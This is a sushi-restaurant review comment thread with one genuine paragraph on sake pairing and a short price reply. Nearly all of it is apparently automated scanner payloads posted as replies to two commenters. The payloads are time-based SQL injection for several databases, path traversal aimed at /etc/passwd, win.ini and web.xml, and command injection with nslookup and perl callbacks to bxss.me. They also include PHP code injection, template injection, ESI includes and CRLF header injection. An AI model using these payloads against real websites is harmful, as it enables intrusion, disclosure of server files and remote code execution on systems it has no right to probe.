For those who drink sake, you can ask Sushi Inomata for their selection of hot sake which I think may be more interesting than Sushi Kimura's. They will be poured from 1.8L bottles and warmed with the right methods and served in the correct ceramic cups. A few selections may be surprising, including aged nama sake and depending on what they choose to pour, and you can let okami san know your preferences if you have them. Also for those feeling adventurous, you can ask for local Saitama prefecture sake, that way you get a great taste of locally brewed sake, some of which are quite fantastic (personally I love Shinkame / Holy Turtle, and Coedo Kagamiyama / Little Edo Mirror Mountain) depending on availability. Shinkame and Kagamiyama tend to be on the dryer side, and judging from a few tabelog photos, dry sake seems to be the way to go here for sake pairing (he has one called Makiri from Yamagata that is a Super Dry Junmai Daiginjo, that one should nicely cleanse any richness from fish). I have found that some of the regular menu sake that can be a fruity, doesn't pair as nicely with his sushi, but may be more approachable for casual sake drinkers.
re: ChuToroZuke
jJBgcK3m
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
-1 OR 2+401-401-1=0+0+0+1
re: ChuToroZuke
-1 OR 3+401-401-1=0+0+0+1
re: ChuToroZuke
if(now()=sysdate(),sleep(15),0)
re: ChuToroZuke
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: ChuToroZuke
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: ChuToroZuke
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: ChuToroZuke
-1; waitfor delay '0:0:15' --
re: ChuToroZuke
-1); waitfor delay '0:0:15' --
re: ChuToroZuke
3Co9zEOP
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
1*
re: ChuToroZuke
-1 OR 2+655-655-1=0+0+0+1
re: ChuToroZuke
-1 OR 3+655-655-1=0+0+0+1
re: ChuToroZuke
1 waitfor delay '0:0:15' --
re: ChuToroZuke
if(now()=sysdate(),sleep(15),0)
re: ChuToroZuke
cvx10UpN'; waitfor delay '0:0:15' --
re: ChuToroZuke
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: ChuToroZuke
-5 OR 261=(SELECT 261 FROM PG_SLEEP(15))--
re: ChuToroZuke
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: ChuToroZuke
-5) OR 313=(SELECT 313 FROM PG_SLEEP(15))--
re: ChuToroZuke
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: ChuToroZuke
-1)) OR 383=(SELECT 383 FROM PG_SLEEP(15))--
re: ChuToroZuke
-1; waitfor delay '0:0:15' --
re: ChuToroZuke
O3Ouadig' OR 472=(SELECT 472 FROM PG_SLEEP(15))--
re: ChuToroZuke
-1); waitfor delay '0:0:15' --
re: ChuToroZuke
wKHU8b3p') OR 595=(SELECT 595 FROM PG_SLEEP(15))--
re: ChuToroZuke
1 waitfor delay '0:0:15' --
re: ChuToroZuke
PnHXuSsr')) OR 12=(SELECT 12 FROM PG_SLEEP(15))--
re: ChuToroZuke
0zs4ezs5'; waitfor delay '0:0:15' --
re: ChuToroZuke
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: ChuToroZuke
-5 OR 505=(SELECT 505 FROM PG_SLEEP(15))--
re: ChuToroZuke
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: ChuToroZuke
-5) OR 81=(SELECT 81 FROM PG_SLEEP(15))--
re: ChuToroZuke
'||(select 1 from (select pg_sleep(15))x)||'
re: ChuToroZuke
-1)) OR 588=(SELECT 588 FROM PG_SLEEP(15))--
re: ChuToroZuke
''||(select 1 from (select pg_sleep(15))x)||''
re: ChuToroZuke
1'"
re: ChuToroZuke
@@KElNm
re: ChuToroZuke
RPxPBO57' OR 102=(SELECT 102 FROM PG_SLEEP(15))--
re: ChuToroZuke
MXL0KH7W') OR 351=(SELECT 351 FROM PG_SLEEP(15))--
re: ChuToroZuke
p9qANsom')) OR 334=(SELECT 334 FROM PG_SLEEP(15))--
re: ChuToroZuke
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: ChuToroZuke
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: ChuToroZuke
'||(select 1 from (select pg_sleep(15))x)||'
re: ChuToroZuke
''||(select 1 from (select pg_sleep(15))x)||''
re: ChuToroZuke
1'"
re: ChuToroZuke
@@Qb1jw
re: ChuToroZuke
1h8R2ECEO
re: ChuToroZuke
response.write(9309270*9781753)
re: ChuToroZuke
'+response.write(9309270*9781753)+'
re: ChuToroZuke
%0abcc:074625.67-14554.67.1a5f6.19990.2@bxss.me
re: ChuToroZuke
"+response.write(9309270*9781753)+"
re: ChuToroZuke
to@example.com>%0d%0abcc:074625.67-14555.67.1a5f6.19990.2@bxss.me
re: ChuToroZuke
<esi:include src="http://bxss.me/rpb.png"/>
re: ChuToroZuke
${9999547+10000126}
re: ChuToroZuke
../../../../../../../../../../../../../../etc/passwd
re: ChuToroZuke
../../../../../../../../../../../../../../windows/win.ini
re: ChuToroZuke
file:///etc/passwd
re: ChuToroZuke
../../../../../../../../../../../../../../../proc/version
re: ChuToroZuke
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: ChuToroZuke
../../../../../../../../../../etc/passwd%00.jpg
re: ChuToroZuke
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: ChuToroZuke
)
re: ChuToroZuke
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: ChuToroZuke
!(()&&!|*|*|
re: ChuToroZuke
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: ChuToroZuke
^(#$!@#$)(()))******
re: ChuToroZuke
echo uttqet$()\ dzttxf\nz^xyu||a #' &echo uttqet$()\ dzttxf\nz^xyu||a #|" &echo uttqet$()\ dzttxf\nz^xyu||a #
re: ChuToroZuke
'.gethostbyname(lc('hitns'.'dhvwokgh88734.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(66).chr(111).chr(87).'
re: ChuToroZuke
/etc/passwd
re: ChuToroZuke
&echo eewqor$()\ lsuvum\nz^xyu||a #' &echo eewqor$()\ lsuvum\nz^xyu||a #|" &echo eewqor$()\ lsuvum\nz^xyu||a #
re: ChuToroZuke
%2fetc%2fpasswd
re: ChuToroZuke
".gethostbyname(lc("hitoj"."mugptcedd13ba.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(74).chr(109).chr(87)."
re: ChuToroZuke
|echo tezlzd$()\ ytedla\nz^xyu||a #' |echo tezlzd$()\ ytedla\nz^xyu||a #|" |echo tezlzd$()\ ytedla\nz^xyu||a #
re: ChuToroZuke
/.././.././.././.././.././.././.././../etc/./passwd%00
re: ChuToroZuke
(nslookup hitbbsnmyhduzb9e65.bxss.me||perl -e "gethostbyname('hitbbsnmyhduzb9e65.bxss.me')")
re: ChuToroZuke
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: ChuToroZuke
$(nslookup hitbvcbucvejv137a4.bxss.me||perl -e "gethostbyname('hitbvcbucvejv137a4.bxss.me')")
re: ChuToroZuke
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: ChuToroZuke
&nslookup hitsrecbmxjys43367.bxss.me&'\"`0&nslookup hitsrecbmxjys43367.bxss.me&`'
re: ChuToroZuke
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: ChuToroZuke
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: ChuToroZuke
&(nslookup hitrqgmhgvvfsf3db6.bxss.me||perl -e "gethostbyname('hitrqgmhgvvfsf3db6.bxss.me')")&'\"`0&(nslookup hitrqgmhgvvfsf3db6.bxss.me||perl -e "gethostbyname('hitrqgmhgvvfsf3db6.bxss.me')")&`'
re: ChuToroZuke
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: ChuToroZuke
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: ChuToroZuke
|(nslookup hitofdwordfks881e3.bxss.me||perl -e "gethostbyname('hitofdwordfks881e3.bxss.me')")
re: ChuToroZuke
Http://bxss.me/t/fit.txt
re: ChuToroZuke
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: ChuToroZuke
`(nslookup hitfxzrfkvcjg8b40f.bxss.me||perl -e "gethostbyname('hitfxzrfkvcjg8b40f.bxss.me')")`
re: ChuToroZuke
http://bxss.me/t/fit.txt%3F.jpg
re: ChuToroZuke
HttP://bxss.me/t/xss.html?%00
re: ChuToroZuke
file:///etc/passwd
re: ChuToroZuke
"+"A".concat(70-3).concat(22*4).concat(102).concat(66).concat(108).concat(74)+(require"socket"
Socket.gethostbyname("hithj"+"qpvektvjc1c03.bxss.me.")[3].to_s)+"
re: ChuToroZuke
;(nslookup hitxihwuserrxffbfb.bxss.me||perl -e "gethostbyname('hitxihwuserrxffbfb.bxss.me')")|(nslookup hitxihwuserrxffbfb.bxss.me||perl -e "gethostbyname('hitxihwuserrxffbfb.bxss.me')")&(nslookup hitxihwuserrxffbfb.bxss.me||perl -e "gethostbyname('hitxihwuserrxffbfb.bxss.me')")
re: ChuToroZuke
/etc/shells
re: ChuToroZuke
bxss.me/t/xss.html?%00
re: ChuToroZuke
'+'A'.concat(70-3).concat(22*4).concat(107).concat(83).concat(103).concat(65)+(require'socket'
Socket.gethostbyname('hitac'+'mydbsvrq54991.bxss.me.')[3].to_s)+'
re: ChuToroZuke
/\../\../\../\../\../\../\../etc/passwd
re: ChuToroZuke
c:/windows/win.ini
re: ChuToroZuke
/WEB-INF/web.xml
re: ChuToroZuke
bxss.me
re: ChuToroZuke
C:\WINDOWS\system32\drivers\etc\hosts
re: ChuToroZuke
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: ChuToroZuke
../../../../../../../../../../windows/win.ini%00.jpg
re: ChuToroZuke
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: ChuToroZuke
/../../../../../../../../../../boot.ini
re: ChuToroZuke
';print(md5(31337));$a='
re: ChuToroZuke
'"
re: ChuToroZuke
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: ChuToroZuke
";print(md5(31337));$a="
re: ChuToroZuke
<!--
re: ChuToroZuke
..\..\..\..\..\..\..\..\windows\win.ini
re: ChuToroZuke
${@print(md5(31337))}
re: ChuToroZuke
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: ChuToroZuke
${@print(md5(31337))}\
re: ChuToroZuke
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: ChuToroZuke
'.print(md5(31337)).'
re: ChuToroZuke
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: ChuToroZuke
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: ChuToroZuke
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: ChuToroZuke
WEB-INF/web.xml
re: ChuToroZuke
WEB-INF\web.xml
re: ChuToroZuke
1
re: ChuToroZuke
1
re: ChuToroZuke
-1 OR 2+800-800-1=0+0+0+1 --
re: ChuToroZuke
-1 OR 3+800-800-1=0+0+0+1 --
re: ChuToroZuke
-1 OR 2+494-494-1=0+0+0+1
re: ChuToroZuke
-1 OR 3+494-494-1=0+0+0+1
re: ChuToroZuke
-1' OR 2+760-760-1=0+0+0+1 --
re: ChuToroZuke
-1' OR 3+760-760-1=0+0+0+1 --
re: ChuToroZuke
-1' OR 2+269-269-1=0+0+0+1 or '1bA9MUAJ'='
re: ChuToroZuke
-1' OR 3+269-269-1=0+0+0+1 or '1bA9MUAJ'='
re: ChuToroZuke
-1" OR 2+42-42-1=0+0+0+1 --
re: ChuToroZuke
-1" OR 3+42-42-1=0+0+0+1 --
re: ChuToroZuke
if(now()=sysdate(),sleep(15),0)
re: ChuToroZuke
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: ChuToroZuke
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: ChuToroZuke
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: ChuToroZuke
-1; waitfor delay '0:0:15' --
re: ChuToroZuke
-1); waitfor delay '0:0:15' --
re: ChuToroZuke
1 waitfor delay '0:0:15' --
re: ChuToroZuke
1KMzRClq'; waitfor delay '0:0:15' --
re: ChuToroZuke
-5 OR 972=(SELECT 972 FROM PG_SLEEP(15))--
re: ChuToroZuke
-5) OR 581=(SELECT 581 FROM PG_SLEEP(15))--
re: ChuToroZuke
-1)) OR 52=(SELECT 52 FROM PG_SLEEP(15))--
re: ChuToroZuke
egtSfcXQ' OR 307=(SELECT 307 FROM PG_SLEEP(15))--
re: ChuToroZuke
BSLlevcR') OR 105=(SELECT 105 FROM PG_SLEEP(15))--
re: ChuToroZuke
odnKbKp3')) OR 202=(SELECT 202 FROM PG_SLEEP(15))--
re: ChuToroZuke
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: ChuToroZuke
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: ChuToroZuke
'||(select 1 from (select pg_sleep(15))x)||'
re: ChuToroZuke
''||(select 1 from (select pg_sleep(15))x)||''
re: ChuToroZuke
1'"
re: ChuToroZuke
@@pPYOB
@Guest It was a little over 40,000 including a glass of grape juice, water, and one add-on nigiri.
re: Just_Ingest
Q3OjVtuG
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
-1 OR 2+191-191-1=0+0+0+1
re: Just_Ingest
-1 OR 3+191-191-1=0+0+0+1
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
pV0jcrs9
re: Just_Ingest
1*
re: Just_Ingest
gxx8CK06'; waitfor delay '0:0:15' --
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
1*
re: Just_Ingest
-1 OR 2+154-154-1=0+0+0+1
re: Just_Ingest
-1 OR 3+154-154-1=0+0+0+1
re: Just_Ingest
-5 OR 752=(SELECT 752 FROM PG_SLEEP(15))--
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
-5) OR 977=(SELECT 977 FROM PG_SLEEP(15))--
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
-1)) OR 316=(SELECT 316 FROM PG_SLEEP(15))--
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
lhyJwKR1' OR 758=(SELECT 758 FROM PG_SLEEP(15))--
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
CKCo8bYz') OR 589=(SELECT 589 FROM PG_SLEEP(15))--
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
30q4ZuLa')) OR 327=(SELECT 327 FROM PG_SLEEP(15))--
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
rhwaqv5s'; waitfor delay '0:0:15' --
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
-5 OR 147=(SELECT 147 FROM PG_SLEEP(15))--
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
-5) OR 265=(SELECT 265 FROM PG_SLEEP(15))--
re: Just_Ingest
@@yUQXQ
re: Just_Ingest
-1)) OR 827=(SELECT 827 FROM PG_SLEEP(15))--
re: Just_Ingest
hMGc3osE' OR 971=(SELECT 971 FROM PG_SLEEP(15))--
re: Just_Ingest
buubcZyS') OR 547=(SELECT 547 FROM PG_SLEEP(15))--
re: Just_Ingest
DyXE8hJa')) OR 760=(SELECT 760 FROM PG_SLEEP(15))--
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
1'"
re: Just_Ingest
@@tncHi
re: Just_Ingest
1nn0yvI8O
re: Just_Ingest
response.write(9804524*9131859)
re: Just_Ingest
'+response.write(9804524*9131859)+'
re: Just_Ingest
%0abcc:074625.67-14543.67.ef016.19990.2@bxss.me
re: Just_Ingest
"+response.write(9804524*9131859)+"
re: Just_Ingest
to@example.com>%0d%0abcc:074625.67-14544.67.ef016.19990.2@bxss.me
re: Just_Ingest
../../../../../../../../../../../../../../etc/passwd
re: Just_Ingest
<esi:include src="http://bxss.me/rpb.png"/>
re: Just_Ingest
../../../../../../../../../../../../../../windows/win.ini
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
../../../../../../../../../../../../../../../proc/version
re: Just_Ingest
${9999402+9999719}
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Just_Ingest
../../../../../../../../../../etc/passwd%00.jpg
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Just_Ingest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Just_Ingest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Just_Ingest
/etc/passwd
re: Just_Ingest
echo komvvq$()\ hjfknj\nz^xyu||a #' &echo komvvq$()\ hjfknj\nz^xyu||a #|" &echo komvvq$()\ hjfknj\nz^xyu||a #
re: Just_Ingest
%2fetc%2fpasswd
re: Just_Ingest
&echo hiepxi$()\ fcyjgn\nz^xyu||a #' &echo hiepxi$()\ fcyjgn\nz^xyu||a #|" &echo hiepxi$()\ fcyjgn\nz^xyu||a #
re: Just_Ingest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Just_Ingest
|echo wovfaw$()\ glsgtr\nz^xyu||a #' |echo wovfaw$()\ glsgtr\nz^xyu||a #|" |echo wovfaw$()\ glsgtr\nz^xyu||a #
re: Just_Ingest
